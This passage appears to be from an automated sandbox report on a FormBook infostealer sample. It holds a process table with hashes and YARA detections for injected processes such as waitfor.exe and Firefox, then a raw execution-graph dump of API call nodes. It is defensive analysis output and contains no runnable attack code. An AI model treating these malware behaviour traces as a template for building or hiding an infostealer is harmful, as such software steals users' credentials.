                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2249418016.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2248660468.0000000002970000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:3
                                                                                  Start time:18:18:09
                                                                                  Start date:11/12/2024
                                                                                  Path:C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe"
                                                                                  Imagebase:0xf60000
                                                                                  File size:140'800 bytes
                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4473260603.0000000003AB0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  Target ID:5
                                                                                  Start time:18:18:11
                                                                                  Start date:11/12/2024
                                                                                  Path:C:\Windows\SysWOW64\waitfor.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\SysWOW64\waitfor.exe"
                                                                                  Imagebase:0xc50000
                                                                                  File size:32'768 bytes
                                                                                  MD5 hash:E58E152B44F20DD099C5105DE482DF24
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4473308327.00000000048C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4473351797.0000000004910000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4472444044.0000000002C60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:low
                                                                                  Has exited:false

                                                                                  Target ID:6
                                                                                  Start time:18:18:23
                                                                                  Start date:11/12/2024
                                                                                  Path:C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe"
                                                                                  Imagebase:0xf60000
                                                                                  File size:140'800 bytes
                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  Target ID:7
                                                                                  Start time:18:18:35
                                                                                  Start date:11/12/2024
                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                  Imagebase:0x7ff79f9e0000
                                                                                  File size:676'768 bytes
                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                    Execution Graph

                                                                                    Execution Coverage:2.9%
                                                                                    Dynamic/Decrypted Code Coverage:0.5%
                                                                                    Signature Coverage:7.3%
                                                                                    Total number of Nodes:2000
                                                                                    Total number of Limit Nodes:166
b70db6 Mailbox 59 API calls 105159->105160 105161 b592e4 105160->105161 105162 b53924 105161->105162 105535 b591fc 59 API calls Mailbox 105161->105535 105164 b59050 105162->105164 105536 b59160 105164->105536 105166 b70db6 Mailbox 59 API calls 105168 b53932 105166->105168 105167 b5905f 105167->105166 105167->105168 105169 b58ee0 105168->105169 105170 b8f17c 105169->105170 105172 b58ef7 105169->105172 105170->105172 105546 b58bdb 59 API calls Mailbox 105170->105546 105173 b58fff 105172->105173 105174 b59040 105172->105174 105175 b58ff8 105172->105175 105173->104923 105545 b59d3c 60 API calls Mailbox 105174->105545 105177 b70db6 Mailbox 59 API calls 105175->105177 105177->105173 105179 b54ee5 85 API calls 105178->105179 105180 bb95ca 105179->105180 105547 bb9734 105180->105547 105183 b54f0b 74 API calls 105184 bb95f7 105183->105184 105185 b54f0b 74 API calls 105184->105185 105186 bb9607 105185->105186 105187 b54f0b 74 API calls 105186->105187 105188 bb9622 105187->105188 105189 b54f0b 74 API calls 105188->105189 105190 bb963d 105189->105190 105191 b54ee5 85 API calls 105190->105191 105192 bb9654 105191->105192 105193 b7571c __malloc_crt 58 API calls 105192->105193 105194 bb965b 105193->105194 105195 b7571c __malloc_crt 58 API calls 105194->105195 105196 bb9665 105195->105196 105197 b54f0b 74 API calls 105196->105197 105198 bb9679 105197->105198 105199 bb9109 GetSystemTimeAsFileTime 105198->105199 105200 bb968c 105199->105200 105201 bb96a1 105200->105201 105202 bb96b6 105200->105202 105203 b72d55 _free 58 API calls 105201->105203 105204 bb971b 105202->105204 105205 bb96bc 105202->105205 105206 bb96a7 105203->105206 105208 b72d55 _free 58 API calls 105204->105208 105553 bb8b06 116 API calls __fcloseall 105205->105553 105209 b72d55 _free 58 API calls 105206->105209 105211 b8d186 105208->105211 105209->105211 105210 bb9713 105212 b72d55 _free 58 API calls 105210->105212 105211->104860 105213 b54e4a 105211->105213 105212->105211 105214 b54e54 105213->105214 105216 b54e5b 
105213->105216 105554 b753a6 105214->105554 105217 b54e7b FreeLibrary 105216->105217 105218 b54e6a 105216->105218 105217->105218 105218->104860 105228 b57e4f 105219->105228 105221 b579fd 105221->105097 105223 b53f82 105222->105223 105227 b53fa4 _memmove 105222->105227 105225 b70db6 Mailbox 59 API calls 105223->105225 105224 b70db6 Mailbox 59 API calls 105226 b53fb8 105224->105226 105225->105227 105226->105105 105227->105224 105229 b57e62 105228->105229 105231 b57e5f _memmove 105228->105231 105230 b70db6 Mailbox 59 API calls 105229->105230 105230->105231 105231->105221 105281 b54c03 105232->105281 105235 b54c03 2 API calls 105238 b54bdc 105235->105238 105236 b54bf5 105239 b7525b 105236->105239 105237 b54bec FreeLibrary 105237->105236 105238->105236 105238->105237 105285 b75270 105239->105285 105241 b54dfc 105241->105112 105241->105113 105445 b54c36 105242->105445 105245 b54c36 2 API calls 105248 b54b8f 105245->105248 105246 b54ba1 FreeLibrary 105247 b54baa 105246->105247 105249 b54c70 105247->105249 105248->105246 105248->105247 105250 b70db6 Mailbox 59 API calls 105249->105250 105251 b54c85 105250->105251 105449 b5522e 105251->105449 105253 b54c91 _memmove 105254 b54ccc 105253->105254 105256 b54dc1 105253->105256 105257 b54d89 105253->105257 105255 b54ec7 69 API calls 105254->105255 105260 b54cd5 105255->105260 105463 bb991b 95 API calls 105256->105463 105452 b54e89 CreateStreamOnHGlobal 105257->105452 105261 b54f0b 74 API calls 105260->105261 105262 b54d69 105260->105262 105264 b8d8a7 105260->105264 105458 b54ee5 105260->105458 105261->105260 105262->105121 105265 b54ee5 85 API calls 105264->105265 105266 b8d8bb 105265->105266 105267 b54f0b 74 API calls 105266->105267 105267->105262 105269 b8d9cd 105268->105269 105270 b54f1d 105268->105270 105487 b755e2 105270->105487 105273 bb9109 105507 bb8f5f 105273->105507 105275 bb911f 105275->105128 105277 b54ed6 105276->105277 105278 b8d990 105276->105278 105512 b75c60 105277->105512 105280 b54ede 105280->105130 105282 
b54bd0 105281->105282 105283 b54c0c LoadLibraryA 105281->105283 105282->105235 105282->105238 105283->105282 105284 b54c1d GetProcAddress 105283->105284 105284->105282 105286 b7527c type_info::_Type_info_dtor 105285->105286 105287 b7528f 105286->105287 105290 b752c0 105286->105290 105334 b78b28 58 API calls __getptd_noexit 105287->105334 105289 b75294 105335 b78db6 9 API calls __wsplitpath_helper 105289->105335 105304 b804e8 105290->105304 105293 b752c5 105294 b752ce 105293->105294 105295 b752db 105293->105295 105336 b78b28 58 API calls __getptd_noexit 105294->105336 105296 b75305 105295->105296 105297 b752e5 105295->105297 105319 b80607 105296->105319 105337 b78b28 58 API calls __getptd_noexit 105297->105337 105301 b7529f type_info::_Type_info_dtor @_EH4_CallFilterFunc@8 105301->105241 105305 b804f4 type_info::_Type_info_dtor 105304->105305 105306 b79c0b __lock 58 API calls 105305->105306 105317 b80502 105306->105317 105307 b80576 105339 b805fe 105307->105339 105308 b8057d 105344 b7881d 58 API calls 2 library calls 105308->105344 105311 b805f3 type_info::_Type_info_dtor 105311->105293 105312 b80584 105312->105307 105345 b79e2b InitializeCriticalSectionAndSpinCount 105312->105345 105313 b79c93 __mtinitlocknum 58 API calls 105313->105317 105316 b805aa EnterCriticalSection 105316->105307 105317->105307 105317->105308 105317->105313 105342 b76c50 59 API calls __lock 105317->105342 105343 b76cba LeaveCriticalSection LeaveCriticalSection _doexit 105317->105343 105320 b80627 __wopenfile 105319->105320 105321 b80641 105320->105321 105333 b807fc 105320->105333 105352 b737cb 60 API calls 2 library calls 105320->105352 105350 b78b28 58 API calls __getptd_noexit 105321->105350 105323 b80646 105351 b78db6 9 API calls __wsplitpath_helper 105323->105351 105325 b8085f 105347 b885a1 105325->105347 105327 b75310 105338 b75332 LeaveCriticalSection LeaveCriticalSection _fseek 105327->105338 105329 b807f5 105329->105333 105353 b737cb 60 API calls 2 library calls 105329->105353 105331 
b80814 105331->105333 105354 b737cb 60 API calls 2 library calls 105331->105354 105333->105321 105333->105325 105334->105289 105335->105301 105336->105301 105337->105301 105338->105301 105346 b79d75 LeaveCriticalSection 105339->105346 105341 b80605 105341->105311 105342->105317 105343->105317 105344->105312 105345->105316 105346->105341 105355 b87d85 105347->105355 105349 b885ba 105349->105327 105350->105323 105351->105327 105352->105329 105353->105331 105354->105333 105356 b87d91 type_info::_Type_info_dtor 105355->105356 105357 b87da7 105356->105357 105360 b87ddd 105356->105360 105442 b78b28 58 API calls __getptd_noexit 105357->105442 105359 b87dac 105443 b78db6 9 API calls __wsplitpath_helper 105359->105443 105366 b87e4e 105360->105366 105363 b87df9 105444 b87e22 LeaveCriticalSection __unlock_fhandle 105363->105444 105365 b87db6 type_info::_Type_info_dtor 105365->105349 105367 b87e6e 105366->105367 105368 b744ea __wsopen_nolock 58 API calls 105367->105368 105372 b87e8a 105368->105372 105369 b87fc1 105370 b78dc6 __invoke_watson 8 API calls 105369->105370 105371 b885a0 105370->105371 105374 b87d85 __wsopen_helper 103 API calls 105371->105374 105372->105369 105373 b87ec4 105372->105373 105381 b87ee7 105372->105381 105375 b78af4 __lseeki64 58 API calls 105373->105375 105376 b885ba 105374->105376 105377 b87ec9 105375->105377 105376->105363 105378 b78b28 __wsplitpath_helper 58 API calls 105377->105378 105379 b87ed6 105378->105379 105382 b78db6 __wsplitpath_helper 9 API calls 105379->105382 105380 b87fa5 105383 b78af4 __lseeki64 58 API calls 105380->105383 105381->105380 105388 b87f83 105381->105388 105384 b87ee0 105382->105384 105385 b87faa 105383->105385 105384->105363 105386 b78b28 __wsplitpath_helper 58 API calls 105385->105386 105387 b87fb7 105386->105387 105389 b78db6 __wsplitpath_helper 9 API calls 105387->105389 105390 b7d294 __alloc_osfhnd 61 API calls 105388->105390 105389->105369 105391 b88051 105390->105391 105392 b8805b 105391->105392 105393 b8807e 
105391->105393 105394 b78af4 __lseeki64 58 API calls 105392->105394 105395 b87cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105393->105395 105396 b88060 105394->105396 105406 b880a0 105395->105406 105397 b78b28 __wsplitpath_helper 58 API calls 105396->105397 105399 b8806a 105397->105399 105398 b8811e GetFileType 105400 b88129 GetLastError 105398->105400 105401 b8816b 105398->105401 105404 b78b28 __wsplitpath_helper 58 API calls 105399->105404 105405 b78b07 __dosmaperr 58 API calls 105400->105405 105410 b7d52a __set_osfhnd 59 API calls 105401->105410 105402 b880ec GetLastError 105403 b78b07 __dosmaperr 58 API calls 105402->105403 105407 b88111 105403->105407 105404->105384 105408 b88150 CloseHandle 105405->105408 105406->105398 105406->105402 105409 b87cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105406->105409 105413 b78b28 __wsplitpath_helper 58 API calls 105407->105413 105408->105407 105411 b8815e 105408->105411 105412 b880e1 105409->105412 105417 b88189 105410->105417 105414 b78b28 __wsplitpath_helper 58 API calls 105411->105414 105412->105398 105412->105402 105413->105369 105415 b88163 105414->105415 105415->105407 105416 b88344 105416->105369 105419 b88517 CloseHandle 105416->105419 105417->105416 105418 b818c1 __lseeki64_nolock 60 API calls 105417->105418 105430 b8820a 105417->105430 105420 b881f3 105418->105420 105421 b87cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105419->105421 105424 b78af4 __lseeki64 58 API calls 105420->105424 105426 b88212 105420->105426 105423 b8853e 105421->105423 105422 b80e5b 70 API calls __read_nolock 105422->105426 105425 b88546 GetLastError 105423->105425 105433 b883ce 105423->105433 105424->105430 105427 b78b07 __dosmaperr 58 API calls 105425->105427 105426->105422 105429 b80add __close_nolock 61 API calls 105426->105429 105426->105430 105431 b897a2 __chsize_nolock 82 API calls 105426->105431 105435 b883c1 105426->105435 105439 b818c1 60 API calls __lseeki64_nolock 
105426->105439 105441 b883aa 105426->105441 105428 b88552 105427->105428 105432 b7d43d __free_osfhnd 59 API calls 105428->105432 105429->105426 105430->105416 105430->105426 105434 b7d886 __write 78 API calls 105430->105434 105436 b818c1 60 API calls __lseeki64_nolock 105430->105436 105431->105426 105432->105433 105433->105369 105434->105430 105437 b80add __close_nolock 61 API calls 105435->105437 105436->105430 105438 b883c8 105437->105438 105440 b78b28 __wsplitpath_helper 58 API calls 105438->105440 105439->105426 105440->105433 105441->105416 105442->105359 105443->105365 105444->105365 105446 b54b83 105445->105446 105447 b54c3f LoadLibraryA 105445->105447 105446->105245 105446->105248 105447->105446 105448 b54c50 GetProcAddress 105447->105448 105448->105446 105450 b70db6 Mailbox 59 API calls 105449->105450 105451 b55240 105450->105451 105451->105253 105453 b54ec0 105452->105453 105454 b54ea3 FindResourceExW 105452->105454 105453->105254 105454->105453 105455 b8d933 LoadResource 105454->105455 105455->105453 105456 b8d948 SizeofResource 105455->105456 105456->105453 105457 b8d95c LockResource 105456->105457 105457->105453 105459 b54ef4 105458->105459 105460 b8d9ab 105458->105460 105464 b7584d 105459->105464 105462 b54f02 105462->105260 105463->105254 105465 b75859 type_info::_Type_info_dtor 105464->105465 105466 b7586b 105465->105466 105468 b75891 105465->105468 105477 b78b28 58 API calls __getptd_noexit 105466->105477 105479 b76c11 105468->105479 105469 b75870 105478 b78db6 9 API calls __wsplitpath_helper 105469->105478 105472 b75897 105485 b757be 83 API calls 5 library calls 105472->105485 105474 b758a6 105486 b758c8 LeaveCriticalSection LeaveCriticalSection _fseek 105474->105486 105476 b7587b type_info::_Type_info_dtor 105476->105462 105477->105469 105478->105476 105480 b76c43 EnterCriticalSection 105479->105480 105481 b76c21 105479->105481 105483 b76c39 105480->105483 105481->105480 105482 b76c29 105481->105482 105484 b79c0b __lock 58 API calls 
105482->105484 105483->105472 105484->105483 105485->105474 105486->105476 105490 b755fd 105487->105490 105489 b54f2e 105489->105273 105491 b75609 type_info::_Type_info_dtor 105490->105491 105492 b7561f _memset 105491->105492 105493 b7564c 105491->105493 105494 b75644 type_info::_Type_info_dtor 105491->105494 105503 b78b28 58 API calls __getptd_noexit 105492->105503 105495 b76c11 __lock_file 59 API calls 105493->105495 105494->105489 105497 b75652 105495->105497 105505 b7541d 72 API calls 6 library calls 105497->105505 105498 b75639 105504 b78db6 9 API calls __wsplitpath_helper 105498->105504 105500 b75668 105506 b75686 LeaveCriticalSection LeaveCriticalSection _fseek 105500->105506 105503->105498 105504->105494 105505->105500 105506->105494 105510 b7520a GetSystemTimeAsFileTime 105507->105510 105509 bb8f6e 105509->105275 105511 b75238 __aulldiv 105510->105511 105511->105509 105513 b75c6c type_info::_Type_info_dtor 105512->105513 105514 b75c93 105513->105514 105515 b75c7e 105513->105515 105516 b76c11 __lock_file 59 API calls 105514->105516 105526 b78b28 58 API calls __getptd_noexit 105515->105526 105518 b75c99 105516->105518 105528 b758d0 67 API calls 6 library calls 105518->105528 105519 b75c83 105527 b78db6 9 API calls __wsplitpath_helper 105519->105527 105522 b75ca4 105529 b75cc4 LeaveCriticalSection LeaveCriticalSection _fseek 105522->105529 105524 b75cb6 105525 b75c8e type_info::_Type_info_dtor 105524->105525 105525->105280 105526->105519 105527->105525 105528->105522 105529->105524 105530->105133 105531->105140 105532->105154 105533->105157 105534->105153 105535->105162 105537 b59169 Mailbox 105536->105537 105538 b8f19f 105537->105538 105543 b59173 105537->105543 105539 b70db6 Mailbox 59 API calls 105538->105539 105541 b8f1ab 105539->105541 105540 b5917a 105540->105167 105543->105540 105544 b59c90 59 API calls Mailbox 105543->105544 105544->105543 105545->105173 105546->105172 105552 bb9748 __tzset_nolock _wcscmp 105547->105552 105548 bb95dc 105548->105183 
105548->105211 105549 b54f0b 74 API calls 105549->105552 105550 bb9109 GetSystemTimeAsFileTime 105550->105552 105551 b54ee5 85 API calls 105551->105552 105552->105548 105552->105549 105552->105550 105552->105551 105553->105210 105555 b753b2 type_info::_Type_info_dtor 105554->105555 105556 b753c6 105555->105556 105558 b753de 105555->105558 105583 b78b28 58 API calls __getptd_noexit 105556->105583 105560 b76c11 __lock_file 59 API calls 105558->105560 105563 b753d6 type_info::_Type_info_dtor 105558->105563 105559 b753cb 105584 b78db6 9 API calls __wsplitpath_helper 105559->105584 105562 b753f0 105560->105562 105567 b7533a 105562->105567 105563->105216 105568 b7535d 105567->105568 105569 b75349 105567->105569 105581 b75359 105568->105581 105586 b74a3d 105568->105586 105629 b78b28 58 API calls __getptd_noexit 105569->105629 105572 b7534e 105630 b78db6 9 API calls __wsplitpath_helper 105572->105630 105578 b75377 105603 b80a02 105578->105603 105580 b7537d 105580->105581 105582 b72d55 _free 58 API calls 105580->105582 105585 b75415 LeaveCriticalSection LeaveCriticalSection _fseek 105581->105585 105582->105581 105583->105559 105584->105563 105585->105563 105587 b74a50 105586->105587 105591 b74a74 105586->105591 105588 b746e6 __flsbuf 58 API calls 105587->105588 105587->105591 105589 b74a6d 105588->105589 105631 b7d886 105589->105631 105592 b80b77 105591->105592 105593 b75371 105592->105593 105594 b80b84 105592->105594 105596 b746e6 105593->105596 105594->105593 105595 b72d55 _free 58 API calls 105594->105595 105595->105593 105597 b74705 105596->105597 105598 b746f0 105596->105598 105597->105578 105766 b78b28 58 API calls __getptd_noexit 105598->105766 105600 b746f5 105767 b78db6 9 API calls __wsplitpath_helper 105600->105767 105602 b74700 105602->105578 105604 b80a0e type_info::_Type_info_dtor 105603->105604 105605 b80a1b 105604->105605 105606 b80a32 105604->105606 105783 b78af4 58 API calls __getptd_noexit 105605->105783 105607 b80abd 105606->105607 105609 b80a42 
105606->105609 105788 b78af4 58 API calls __getptd_noexit 105607->105788 105612 b80a6a 105609->105612 105613 b80a60 105609->105613 105611 b80a20 105784 b78b28 58 API calls __getptd_noexit 105611->105784 105617 b7d206 ___lock_fhandle 59 API calls 105612->105617 105785 b78af4 58 API calls __getptd_noexit 105613->105785 105614 b80a65 105789 b78b28 58 API calls __getptd_noexit 105614->105789 105619 b80a70 105617->105619 105621 b80a8e 105619->105621 105622 b80a83 105619->105622 105620 b80ac9 105790 b78db6 9 API calls __wsplitpath_helper 105620->105790 105786 b78b28 58 API calls __getptd_noexit 105621->105786 105768 b80add 105622->105768 105625 b80a27 type_info::_Type_info_dtor 105625->105580 105627 b80a89 105787 b80ab5 LeaveCriticalSection __unlock_fhandle 105627->105787 105629->105572 105630->105581 105632 b7d892 type_info::_Type_info_dtor 105631->105632 105633 b7d8b6 105632->105633 105634 b7d89f 105632->105634 105635 b7d955 105633->105635 105637 b7d8ca 105633->105637 105732 b78af4 58 API calls __getptd_noexit 105634->105732 105738 b78af4 58 API calls __getptd_noexit 105635->105738 105640 b7d8f2 105637->105640 105641 b7d8e8 105637->105641 105639 b7d8a4 105733 b78b28 58 API calls __getptd_noexit 105639->105733 105659 b7d206 105640->105659 105734 b78af4 58 API calls __getptd_noexit 105641->105734 105642 b7d8ed 105739 b78b28 58 API calls __getptd_noexit 105642->105739 105646 b7d8f8 105648 b7d91e 105646->105648 105649 b7d90b 105646->105649 105735 b78b28 58 API calls __getptd_noexit 105648->105735 105668 b7d975 105649->105668 105650 b7d961 105740 b78db6 9 API calls __wsplitpath_helper 105650->105740 105654 b7d8ab type_info::_Type_info_dtor 105654->105591 105655 b7d917 105737 b7d94d LeaveCriticalSection __unlock_fhandle 105655->105737 105656 b7d923 105736 b78af4 58 API calls __getptd_noexit 105656->105736 105660 b7d212 type_info::_Type_info_dtor 105659->105660 105661 b7d261 EnterCriticalSection 105660->105661 105663 b79c0b __lock 58 API calls 105660->105663 105662 b7d287 
type_info::_Type_info_dtor 105661->105662 105662->105646 105664 b7d237 105663->105664 105665 b7d24f 105664->105665 105741 b79e2b InitializeCriticalSectionAndSpinCount 105664->105741 105742 b7d28b LeaveCriticalSection _doexit 105665->105742 105669 b7d982 __ftell_nolock 105668->105669 105670 b7d9b6 105669->105670 105671 b7d9c1 105669->105671 105672 b7d9e0 105669->105672 105674 b7c5f6 __ld12tod 6 API calls 105670->105674 105752 b78af4 58 API calls __getptd_noexit 105671->105752 105676 b7da38 105672->105676 105677 b7da1c 105672->105677 105678 b7e1d6 105674->105678 105675 b7d9c6 105753 b78b28 58 API calls __getptd_noexit 105675->105753 105680 b7da51 105676->105680 105758 b818c1 60 API calls 3 library calls 105676->105758 105755 b78af4 58 API calls __getptd_noexit 105677->105755 105678->105655 105743 b85c6b 105680->105743 105682 b7d9cd 105754 b78db6 9 API calls __wsplitpath_helper 105682->105754 105685 b7da21 105756 b78b28 58 API calls __getptd_noexit 105685->105756 105687 b7da5f 105689 b7ddb8 105687->105689 105759 b799ac 58 API calls 2 library calls 105687->105759 105691 b7ddd6 105689->105691 105692 b7e14b WriteFile 105689->105692 105690 b7da28 105757 b78db6 9 API calls __wsplitpath_helper 105690->105757 105695 b7defa 105691->105695 105700 b7ddec 105691->105700 105696 b7ddab GetLastError 105692->105696 105703 b7dd78 105692->105703 105706 b7df05 105695->105706 105709 b7dfef 105695->105709 105696->105703 105697 b7da8b GetConsoleMode 105697->105689 105699 b7daca 105697->105699 105698 b7e184 105698->105670 105764 b78b28 58 API calls __getptd_noexit 105698->105764 105699->105689 105704 b7dada GetConsoleCP 105699->105704 105700->105698 105701 b7de5b WriteFile 105700->105701 105701->105696 105705 b7de98 105701->105705 105703->105670 105703->105698 105708 b7ded8 105703->105708 105704->105698 105730 b7db09 105704->105730 105705->105700 105711 b7debc 105705->105711 105706->105698 105712 b7df6a WriteFile 105706->105712 105707 b7e1b2 105765 b78af4 58 API calls __getptd_noexit 
105707->105765 105714 b7dee3 105708->105714 105715 b7e17b 105708->105715 105709->105698 105710 b7e064 WideCharToMultiByte 105709->105710 105710->105696 105724 b7e0ab 105710->105724 105711->105703 105712->105696 105716 b7dfb9 105712->105716 105761 b78b28 58 API calls __getptd_noexit 105714->105761 105763 b78b07 58 API calls 3 library calls 105715->105763 105716->105703 105716->105706 105716->105711 105719 b7e0b3 WriteFile 105722 b7e106 GetLastError 105719->105722 105719->105724 105720 b7dee8 105762 b78af4 58 API calls __getptd_noexit 105720->105762 105722->105724 105724->105703 105724->105709 105724->105711 105724->105719 105725 b862ba 60 API calls __write_nolock 105725->105730 105726 b87a5e WriteConsoleW CreateFileW __putwch_nolock 105729 b7dc5f 105726->105729 105727 b7dbf2 WideCharToMultiByte 105727->105703 105728 b7dc2d WriteFile 105727->105728 105728->105696 105728->105729 105729->105696 105729->105703 105729->105726 105729->105730 105731 b7dc87 WriteFile 105729->105731 105730->105703 105730->105725 105730->105727 105730->105729 105760 b735f5 58 API calls __isleadbyte_l 105730->105760 105731->105696 105731->105729 105732->105639 105733->105654 105734->105642 105735->105656 105736->105655 105737->105654 105738->105642 105739->105650 105740->105654 105741->105665 105742->105661 105744 b85c76 105743->105744 105746 b85c83 105743->105746 105745 b78b28 __wsplitpath_helper 58 API calls 105744->105745 105748 b85c7b 105745->105748 105747 b78b28 __wsplitpath_helper 58 API calls 105746->105747 105749 b85c8f 105746->105749 105750 b85cb0 105747->105750 105748->105687 105749->105687 105751 b78db6 __wsplitpath_helper 9 API calls 105750->105751 105751->105748 105752->105675 105753->105682 105754->105670 105755->105685 105756->105690 105757->105670 105758->105680 105759->105697 105760->105730 105761->105720 105762->105670 105763->105670 105764->105707 105765->105670 105766->105600 105767->105602 105791 b7d4c3 105768->105791 105770 b80b41 105804 b7d43d 59 API calls 2 library 
calls 105770->105804 105771 b80aeb 105771->105770 105773 b80b1f 105771->105773 105776 b7d4c3 __close_nolock 58 API calls 105771->105776 105773->105770 105774 b7d4c3 __close_nolock 58 API calls 105773->105774 105777 b80b2b CloseHandle 105774->105777 105775 b80b49 105778 b80b6b 105775->105778 105805 b78b07 58 API calls 3 library calls 105775->105805 105779 b80b16 105776->105779 105777->105770 105780 b80b37 GetLastError 105777->105780 105778->105627 105782 b7d4c3 __close_nolock 58 API calls 105779->105782 105780->105770 105782->105773 105783->105611 105784->105625 105785->105614 105786->105627 105787->105625 105788->105614 105789->105620 105790->105625 105792 b7d4e3 105791->105792 105793 b7d4ce 105791->105793 105798 b7d508 105792->105798 105808 b78af4 58 API calls __getptd_noexit 105792->105808 105806 b78af4 58 API calls __getptd_noexit 105793->105806 105795 b7d4d3 105807 b78b28 58 API calls __getptd_noexit 105795->105807 105798->105771 105799 b7d512 105809 b78b28 58 API calls __getptd_noexit 105799->105809 105800 b7d4db 105800->105771 105802 b7d51a 105810 b78db6 9 API calls __wsplitpath_helper 105802->105810 105804->105775 105805->105778 105806->105795 105807->105800 105808->105799 105809->105802 105810->105800 105873 b81940 105811->105873 105814 b5477c 105817 b57bcc 59 API calls 105814->105817 105815 b54799 105879 b57d8c 105815->105879 105818 b54788 105817->105818 105875 b57726 105818->105875 105821 b70791 105822 b81940 __ftell_nolock 105821->105822 105823 b7079e GetLongPathNameW 105822->105823 105824 b57bcc 59 API calls 105823->105824 105825 b572bd 105824->105825 105826 b5700b 105825->105826 105827 b57667 59 API calls 105826->105827 105828 b5701d 105827->105828 105829 b54750 60 API calls 105828->105829 105830 b57028 105829->105830 105831 b57033 105830->105831 105832 b8e885 105830->105832 105834 b53f74 59 API calls 105831->105834 105836 b8e89f 105832->105836 105893 b57908 61 API calls 105832->105893 105835 b5703f 105834->105835 105887 b534c2 105835->105887 105838 
b57052 Mailbox 105838->104939 105840 b54ddd 136 API calls 105839->105840 105841 b5688f 105840->105841 105842 b8e031 105841->105842 105844 b54ddd 136 API calls 105841->105844 105843 bb955b 122 API calls 105842->105843 105845 b8e046 105843->105845 105846 b568a3 105844->105846 105847 b8e04a 105845->105847 105848 b8e067 105845->105848 105846->105842 105849 b568ab 105846->105849 105850 b54e4a 84 API calls 105847->105850 105851 b70db6 Mailbox 59 API calls 105848->105851 105852 b568b7 105849->105852 105853 b8e052 105849->105853 105850->105853 105857 b8e0ac Mailbox 105851->105857 105894 b56a8c 105852->105894 106000 bb42f8 90 API calls _wprintf 105853->106000 105856 b8e060 105856->105848 105859 b8e260 105857->105859 105863 b8e271 105857->105863 105870 b57de1 59 API calls 105857->105870 105986 b5750f 105857->105986 105994 b5735d 105857->105994 106001 baf73d 59 API calls 2 library calls 105857->106001 106002 baf65e 61 API calls 2 library calls 105857->106002 106003 bb737f 59 API calls Mailbox 105857->106003 105860 b72d55 _free 58 API calls 105859->105860 105861 b8e268 105860->105861 105862 b54e4a 84 API calls 105861->105862 105862->105863 105867 b72d55 _free 58 API calls 105863->105867 105869 b54e4a 84 API calls 105863->105869 106004 baf7a1 89 API calls 4 library calls 105863->106004 105867->105863 105869->105863 105870->105857 105874 b5475d GetFullPathNameW 105873->105874 105874->105814 105874->105815 105876 b57734 105875->105876 105883 b57d2c 105876->105883 105878 b54794 105878->105821 105880 b57da6 105879->105880 105882 b57d99 105879->105882 105881 b70db6 Mailbox 59 API calls 105880->105881 105881->105882 105882->105818 105884 b57d3a 105883->105884 105886 b57d43 _memmove 105883->105886 105885 b57e4f 59 API calls 105884->105885 105884->105886 105885->105886 105886->105878 105888 b534d4 105887->105888 105892 b534f3 _memmove 105887->105892 105890 b70db6 Mailbox 59 API calls 105888->105890 105889 b70db6 Mailbox 59 API calls 105891 b5350a 105889->105891 105890->105892 
Control-flow Graph

